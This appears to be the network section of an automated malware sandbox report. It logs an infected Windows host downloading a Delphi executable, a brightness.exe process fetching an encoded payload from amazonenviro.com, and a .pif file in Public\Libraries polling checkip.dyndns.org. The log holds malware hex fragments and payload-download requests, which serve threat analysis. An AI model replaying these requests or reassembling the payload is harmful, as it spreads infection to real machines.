Jan 7, 2025 13:25:00.667083979 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 07 Jan 2025 08:16:47 GMT Accept-Ranges: bytes ETag: "65d1a17edc60db1:0" Server: Microsoft-IIS/8.5 Date: Tue, 07 Jan 2025 12:25:00 GMT Content-Length: 1161216 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@@Pn& \|TW.text `.itextH `.data@ @.bss6.idatan&P(@.tls4.rdata@@.reloc\|~@B.rsrc @@@@@
Jan 7, 2025 13:25:00.667103052 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@@
Jan 7, 2025 13:25:00.667114019 CET	1236	IN	Data Raw: 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df Data Ascii: (z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l\|<x,<DD@,<xH9JtG!(G
Jan 7, 2025 13:25:00.667124987 CET	1236	IN	Data Raw: fe 29 3d 20 17 47 00 89 35 1c 17 47 00 eb 21 0f b7 43 1a 89 c7 e8 e5 fc ff ff 89 c6 85 c0 75 10 a2 18 17 47 00 88 03 5f 5e 5b c3 80 64 37 fc f7 8d 4f 06 89 4e fc 31 c0 a2 18 17 47 00 89 1e 89 46 08 c7 46 0c 01 00 00 00 89 73 10 8d 46 20 0f b7 4b Data Ascii: )= G5G!CuG_^[d7ON1GFFsF KS){p_^[%Gt?jv%Gt)j`=,0u#(Gt^#$Gt
Jan 7, 2025 13:25:00.667138100 CET	896	IN	Data Raw: 23 5e fc 09 eb 89 5e fc 89 cb 8b 57 fc f6 c2 01 75 09 83 ca 08 89 57 fc eb 17 90 89 f8 83 e2 f0 01 d3 01 d7 81 fa 30 0b 00 00 72 05 e8 ee f6 ff ff 89 5f f8 8d 43 03 89 44 2e fc 81 fb 30 0b 00 00 72 0a 8d 04 2e 89 da e8 12 f7 ff ff c6 05 18 17 47 Data Ascii: #^^WuW0r_CD.0r.G]_^[to]_^[G,9=MGtO%Gt'QRjfZY%GtQRjLZY#^Gt~,9w
Jan 7, 2025 13:25:00.703648090 CET	1236	IN	Data Raw: 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 Data Ascii: 0000?000G_@SV^[USVE@;rM
Jan 7, 2025 13:25:00.703670025 CET	1236	IN	Data Raw: d8 07 fe ff ff 85 f8 47 fe ff 8b c3 e8 1e fa ff ff 8b d8 85 db 75 8e 8b 7f 04 81 ff 08 17 47 00 0f 85 72 ff ff ff 8b 1d b0 37 47 00 eb 37 8b c3 83 c0 10 e8 5f fd ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8 Data Ascii: GuGr7G7_u&GsGG[7GtG\|GXG3G)@(AG7G>FOGGGGG
Jan 7, 2025 13:25:00.703681946 CET	448	IN	Data Raw: e8 da fe ff ff c7 05 08 17 47 00 08 17 47 00 c7 05 0c 17 47 00 08 17 47 00 be 00 04 00 00 ba a8 17 47 00 8b c2 89 00 89 40 04 83 c2 08 4e 75 f3 c7 05 ac 37 47 00 ac 37 47 00 c7 05 b0 37 47 00 ac 37 47 00 5f 5e 5b c3 8d 40 00 53 56 57 55 bb 08 17 Data Ascii: GGGGG@Nu7G7G7G7G_^[@SVWUG7G{ohjW;u7<FHH@3H Ju[G@Ju^{hjS(;u6v]_^[=7Gt7GP3
Jan 7, 2025 13:25:00.703694105 CET	1236	IN	Data Raw: 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 67 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 59 3a 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 47 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 39 3a 00 00 8b 80 00 00 00 00 8b 40 04 c3 33 c0 c3 53 56 e8 25 3a 00 00 Data Ascii: Yt@g:tY:@3G:t9:@3SV%:t:^:3F3^[@FSV=GtGu9w4F^[@$PRQ9Y
Jan 7, 2025 13:25:00.703705072 CET	1236	IN	Data Raw: da dd 14 02 dd 54 02 08 83 c2 10 7c f4 dd c0 c3 90 90 90 85 d2 7e 50 88 4c 02 ff 83 e2 fe f7 da 8d 14 55 80 32 40 00 ff e2 90 90 66 89 48 1c 66 89 48 1a 66 89 48 18 66 89 48 16 66 89 48 14 66 89 48 12 66 89 48 10 66 89 48 0e 66 89 48 0c 66 89 48 Data Ascii: T\|~PLU2@fHfHfHfHfHfHfHfHfHfHfHfHfHfHf@SVWPtl11F t-tb+t_$t_xtZXtU0uFxtHXtCt t-0w%9w!Fut}TF~KxI[)G
Jan 7, 2025 13:25:00.703764915 CET	1236	IN	Data Raw: 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 60 37 40 00 8b 45 fc 50 e8 fe db ff ff 33 c0 5a 59 59 64 89 10 68 24 37 40 00 8b 45 fc 50 e8 d8 db ff ff c3 e9 06 09 00 00 eb ef 0f b7 05 20 f0 46 00 66 25 c0 ff 0f b7 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 f0 46 Data Ascii: EPEPjjh`7@EP3ZYYdh$7@EP Ff%Uf?ff F]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- FVWp1A_^@USV3M3Uh'8@d0d E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	166.62.27.188	80	2072	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:02.446954966 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 7, 2025 13:25:03.439518929 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:03 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Sun, 05 Jan 2025 22:51:37 GMT ETag: "2ca99af-bf3d0-62afd5ac0f2a3" Accept-Ranges: bytes Content-Length: 783312 Vary: Accept-Encoding Keep-Alive: timeout=5 Data Raw: 37 6b 4a 35 67 6a 48 77 71 47 59 5a 50 67 6e 54 43 58 5a 43 38 4f 64 59 38 69 64 75 79 67 6e 52 54 76 63 64 67 64 67 49 43 37 6c 43 47 2f 6d 53 75 2f 71 37 4c 52 30 6b 4a 4a 43 7a 42 61 34 77 46 65 2b 6b 73 76 79 36 51 52 45 6d 4a 70 75 38 2b 61 67 74 4a 65 71 74 6d 46 65 56 43 45 4e 68 72 36 52 4f 70 42 30 33 59 72 75 4d 55 6f 34 67 4b 30 36 75 69 31 32 51 48 6a 4e 59 71 61 5a 59 6b 2f 56 49 51 2b 52 34 52 6f 62 73 56 43 76 6c 63 44 52 38 36 6c 49 33 31 6d 68 42 62 66 64 4e 79 54 55 59 56 48 75 68 78 6b 72 42 55 59 68 5a 34 6f 4b 52 38 32 65 4c 57 44 59 58 41 51 78 67 42 4d 50 48 79 49 41 45 54 32 77 72 72 64 52 30 42 31 4f 42 4f 37 4b 39 35 44 35 65 66 54 44 69 62 5a 49 77 54 33 39 36 4f 64 35 35 64 4b 45 36 46 64 6c 52 71 4b 57 6a 38 45 76 4b 58 36 6d 58 6b 31 51 46 66 45 43 7a 34 4e 67 31 2f 62 41 46 78 74 48 4a 51 51 4b 30 41 64 62 58 70 34 46 55 49 64 6e 30 65 4f 5a 31 54 68 48 67 43 34 2b 72 6d 43 51 6b 58 4f 58 31 61 4b 2f 4e 4b 31 37 6d 2b 34 54 48 74 62 5a 43 59 34 6c 57 6d 4d 6d 38 4c 68 [TRUNCATED] Data Ascii: 7kJ5gjHwqGYZPgnTCXZC8OdY8iduygnRTvcdgdgIC7lCG/mSu/q7LR0kJJCzBa4wFe+ksvy6QREmJpu8+agtJeqtmFeVCENhr6ROpB03YruMUo4gK06ui12QHjNYqaZYk/VIQ+R4RobsVCvlcDR86lI31mhBbfdNyTUYVHuhxkrBUYhZ4oKR82eLWDYXAQxgBMPHyIAET2wrrdR0B1OBO7K95D5efTDibZIwT396Od55dKE6FdlRqKWj8EvKX6mXk1QFfECz4Ng1/bAFxtHJQQK0AdbXp4FUIdn0eOZ1ThHgC4+rmCQkXOX1aK/NK17m+4THtbZCY4lWmMm8Lh3dSKTlFZ67/331TvVxywG0OWYHbOf8wD5SQtXCEdEoIuzWxA67Xe8UxZtk3y8gIW/JW8sqDA+EzliSDyQk96HVIeEZ7/7AeS1vOSX11YpfXoQBZvLYnklo/VfupaxBnBpTNN3FMIMCLlax5SYkyxpWOKiYTeIdWzc2rItO0E8BXNOCZZ0j9HT0VoREt+WvZ0ekSsabmoNiMKNlvJ+HZ/OpMOWHchRA506tnIj6V84gpW54IVGTYqCHgRxaj16bv8v4M2ppTtDRamUj0/+B4IUSOq8NmtrZxEw319Ahp9rEVCt4QGnIyb06J9RInN++LyYkzFvnftlZ/OcelWjIW+zTIJN4iQYXt+A+JiQl+s61EuArEfDWhSysUv/yjLAurEvw9ZGtR3oEDgeN2R/ZH/Drld0n0x5FXISs8cpX+FqGq/PeY/tmtI8imSdVN9/HMZsIU0bdr/G6+zVKynwxxuoxTdVyNLQ5EUHNfVmbJf9Kz4FgihDrFm+nMmsORWNyoD11ED1VddIMmNVtbQo1ui3McYULPagkJH6ZlJbwR2hBaNALai3LHoGtv2fz32TZCu2Kx5dk2sPepb2WBIrXzSsH5uu
Jan 7, 2025 13:25:03.439539909 CET	1236	IN	Data Raw: 64 74 4b 58 30 49 4e 66 44 47 4e 32 54 2b 6a 65 6e 4b 64 6c 71 77 50 64 4a 64 44 54 65 6e 5a 41 6c 52 36 76 75 78 5a 64 33 48 70 42 6b 36 57 79 6b 61 52 78 53 69 31 50 46 77 6e 41 76 32 79 76 59 4f 49 68 71 65 67 4d 2b 67 30 58 49 70 59 6f 46 55 Data Ascii: dtKX0INfDGN2T+jenKdlqwPdJdDTenZAlR6vuxZd3HpBk6WykaRxSi1PFwnAv2yvYOIhqegM+g0XIpYoFUIlb0HuN6l0phSViOqV4M3gsCgKWrS23OiYk9cS3S3oYQy+3cht9JiQpPbJ8VZgQQ2GqoGeUJCaTas/nQ90UUSvXo2V57O9LTObKKXBJ+PmQ2yXdKwzqi7j7xUIZAT0JGW3xXEPmaTXj+PIfdcMA2yr3IGvlEdZPBx
Jan 7, 2025 13:25:03.439553022 CET	448	IN	Data Raw: 32 32 68 4f 79 4d 41 67 4f 6a 73 59 4d 30 31 50 77 4a 69 53 59 72 67 71 33 50 68 41 53 62 6f 74 4a 79 55 77 56 45 36 4f 79 38 4c 74 6b 2f 2f 4f 67 75 45 6a 62 4b 41 72 71 6d 64 72 35 71 32 59 54 49 30 62 77 74 77 69 6b 77 4c 63 34 49 62 77 43 78 Data Ascii: 22hOyMAgOjsYM01PwJiSYrgq3PhASbotJyUwVE6Oy8Ltk//OguEjbKArqmdr5q2YTI0bwtwikwLc4IbwCxbyeXjrF+GvPuWLzHOGWy984Hdv3fLLmUwatD23Y3jT+0Rx4ecGyKiQmtBVt0MVBIq3qkM6oBVB7LbiXbgVdoTnOhYrzMmhgsJqABiimR4DFhmdGlkncl3gdLoles451ClqcYrq5posNU3I4sLGnlA9TkSngjx7kv/
Jan 7, 2025 13:25:03.439563990 CET	1236	IN	Data Raw: 47 39 67 39 74 35 6d 70 63 33 48 65 6d 4c 77 57 7a 5a 65 47 39 33 43 59 6d 48 61 49 6c 34 63 57 63 2f 56 6e 4e 47 4e 46 6f 6a 76 56 67 70 57 4c 4b 62 73 68 4b 38 62 44 2b 67 61 43 6f 54 50 78 32 38 65 42 78 76 77 30 6d 4a 48 4d 78 6c 71 5a 70 41 Data Ascii: G9g9t5mpc3HemLwWzZeG93CYmHaIl4cWc/VnNGNFojvVgpWLKbshK8bD+gaCoTPx28eBxvw0mJHMxlqZpAF2MTdZoiEzys16jeI31VqBL/03XLRuJD4nDjRoxfFi3mqf4Ed4wlnaU+oErgdJ/jfPE+8c4IDuqkO+37RMvj3ESE3wpG0KKePiAJewNgtET5mY7IYTgEY9m+E5+ihp3+wdkk59hrA8+LcvSI+FY/2Ngymsibjcn8p
Jan 7, 2025 13:25:03.439577103 CET	1236	IN	Data Raw: 6a 6f 71 71 4a 44 64 70 32 4b 48 6e 38 52 54 4c 61 69 79 6c 39 38 7a 4e 49 6b 37 4d 6b 4a 4c 4a 69 59 78 4d 45 69 62 73 43 71 49 6d 77 4a 61 58 55 4a 69 62 52 5a 77 76 35 6c 62 45 56 32 6b 51 61 46 57 76 6b 4a 39 55 2b 44 50 4e 77 71 41 47 75 4b Data Ascii: joqqJDdp2KHn8RTLaiyl98zNIk7MkJLJiYxMEibsCqImwJaXUJibRZwv5lbEV2kQaFWvkJ9U+DPNwqAGuKg8hkLUGtVMJJ5XA9a9RIRWjx/qrTwP1Rh3X63fB5CsVxgCfmt/gQwbiBZ3iqzQP1Cd05dhEJ70cjL/OQxrlHZStySof8Kuja79U/6ohhNi8KvG09m/J3uplpUjQbnXpOoVKvKCD8mJ4N6lyaxJZiTC+boz+ZndWrI
Jan 7, 2025 13:25:03.439588070 CET	448	IN	Data Raw: 50 62 4e 36 71 2b 2f 75 63 55 2b 57 41 70 69 42 6e 33 64 34 47 64 58 61 76 39 46 75 69 57 4e 47 66 61 67 5a 52 61 55 62 4e 62 59 54 32 50 70 41 79 32 70 6d 52 49 45 4b 5a 46 50 46 51 7a 44 51 37 7a 77 76 52 69 58 6f 55 47 6d 30 75 73 4c 4e 71 68 Data Ascii: PbN6q+/ucU+WApiBn3d4GdXav9FuiWNGfagZRaUbNbYT2PpAy2pmRIEKZFPFQzDQ7zwvRiXoUGm0usLNqhPI+llXGsfmVmQenEEZMtYBjehxESZu4ygmtbqXstJS35QqLkFn7LlajBwAiQ4CEsV524zA3MQOYZiOfbIvCVYXPQGMx7KbsRcndzItdyigK0hIGruRFfc6Hm2Deyx0+F+y0KigP5rp1ELme8gL6L88SV9e2vG4Esp
Jan 7, 2025 13:25:03.439667940 CET	1236	IN	Data Raw: 54 34 30 68 41 54 67 43 46 53 67 42 34 6d 61 66 54 57 35 76 47 57 7a 56 57 56 35 46 72 44 30 4e 38 31 37 47 62 64 6e 38 37 47 54 68 59 6e 68 55 67 6d 57 6d 58 71 72 68 78 76 43 73 74 4b 2f 71 56 4f 68 69 48 35 63 2b 51 38 65 64 76 47 68 49 4b 41 Data Ascii: T40hATgCFSgB4mafTW5vGWzVWV5FrD0N817Gbdn87GThYnhUgmWmXqrhxvCstK/qVOhiH5c+Q8edvGhIKAcHmM9PR343/ynkQHh1MsxI/yuZ8lQTCa+wEBlzjO174rex2LrBnBgzzMuAfTIu2q3waw4r4AtyX8uN+HAn1Z9wTddbB0Z7txXFYGxFg4A4x2MvOhvHJkfHpRCgf6aK2lbg5F5KNT+lIR3/v7raWsdMcAmhpw/FjHn
Jan 7, 2025 13:25:03.439713001 CET	1236	IN	Data Raw: 61 31 35 58 47 47 43 59 6d 34 5a 38 4c 54 4c 5a 64 65 58 47 49 54 6c 7a 62 6f 50 32 5a 6c 68 61 68 4d 4d 6a 31 50 34 33 79 63 62 67 33 74 54 55 67 76 6c 59 59 56 41 72 55 4b 51 6b 71 6d 38 65 65 6a 49 76 47 6b 48 4b 32 36 6d 76 31 6f 50 43 30 67 Data Ascii: a15XGGCYm4Z8LTLZdeXGITlzboP2ZlhahMMj1P43ycbg3tTUgvlYYVArUKQkqm8eejIvGkHK26mv1oPC0gx/0S+KkNA9UR3W3kZRP6h5F7vpA7LiWECVAQRGM7CYktF2r973c5r9BFFzuacRoWGbbmPS1a6rtY9XkEsUoFmTufLGL6RzXQtNTyCMSz5K2IwtH1nIYbqx6QOpUI2k+MED62U4P8DaCazu1WxXeIM6vS/FwrRi9+C
Jan 7, 2025 13:25:03.439723969 CET	448	IN	Data Raw: 42 56 6a 77 37 35 78 33 6d 50 4a 42 72 69 77 58 70 4e 4b 50 46 30 53 65 48 75 6b 69 66 66 47 48 64 73 59 30 7a 46 4f 37 32 36 6a 59 6a 51 5a 76 33 42 32 50 39 69 64 70 78 6f 78 66 34 51 59 31 2b 39 57 33 68 45 68 61 37 31 38 79 39 64 67 63 5a 78 Data Ascii: BVjw75x3mPJBriwXpNKPF0SeHukiffGHdsY0zFO726jYjQZv3B2P9idpxoxf4QY1+9W3hEha718y9dgcZxaGpXrJR2AkPU+psb7YJJCR/GGOrLX9oLhto9uukkc+j0og8IwgdxcBx9hHCvbhxJiS5pJy/KrPJdOLBsCGhgPm2EKKIhnpoa+c2Lqj5MMt/BNoeDmlFuBdrwyeaTkszLG4BsEUVphkIGvSHbBCDT9ICzGW6P447tO
Jan 7, 2025 13:25:03.439779043 CET	1236	IN	Data Raw: 2b 5a 6e 31 4d 56 50 4a 31 6b 79 68 37 34 51 71 54 36 74 35 4d 76 70 69 49 58 63 67 4e 67 4c 76 69 6a 53 4f 30 56 4e 62 50 45 57 4d 76 78 50 7a 53 6a 32 6f 6e 59 34 68 69 61 58 73 6e 66 46 4d 43 6b 37 39 5a 31 50 6a 48 70 67 31 30 54 73 5a 44 35 Data Ascii: +Zn1MVPJ1kyh74QqT6t5MvpiIXcgNgLvijSO0VNbPEWMvxPzSj2onY4hiaXsnfFMCk79Z1PjHpg10TsZD5PDXfCux5VbyCxoEJRbFWD2HSYZe1GIyvCIyVOHHAMTFqO2284Xz2J1NDVKTKrp0wFHgXE1jBP4he7yX6ZKpu8UmJISziWsh4YnpZ4ACrrIAWMvTJWWI8QwNoaB2bO81lSgsXyqNStZQDAkNLkCdc8SMLIySDN1tbZ
Jan 7, 2025 13:25:03.444482088 CET	1236	IN	Data Raw: 41 6f 64 75 7a 54 64 35 54 36 57 6b 48 55 35 56 72 4a 43 59 4b 78 79 4d 55 33 4f 5a 46 55 72 33 77 2b 54 49 34 71 6e 6e 58 4c 2b 5a 54 77 72 52 4c 5a 47 63 55 44 4b 34 4b 49 70 57 5a 62 35 33 35 34 41 36 41 79 63 51 68 46 42 2b 63 37 50 6e 32 6e Data Ascii: AoduzTd5T6WkHU5VrJCYKxyMU3OZFUr3w+TI4qnnXL+ZTwrRLZGcUDK4KIpWZb5354A6AycQhFB+c7Pn2nQR/UY6Yuf/fa9JX+FKo0VNXstmzVEpWE5Y8Hkpelsy7wiQkxe9tOu+jK0FCPrLP1ZFIGQdbTu9FGYQqpK7DkI+O95AxEHSi3SvlEBhAeCjAGqftj9/XPfeXGOe51bxUeuwSo/QQNqs+4MJEcOE8b6dUJCYBBG1QoW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49733	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:09.739025116 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:16.890070915 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:16.896199942 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:17.171679974 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:19.271027088 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:19.550362110 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49807	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:20.354180098 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:23.295241117 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49813	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:20.971340895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:24.339050055 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:24.350286961 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:26.030172110 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:29.636305094 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:29.899063110 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
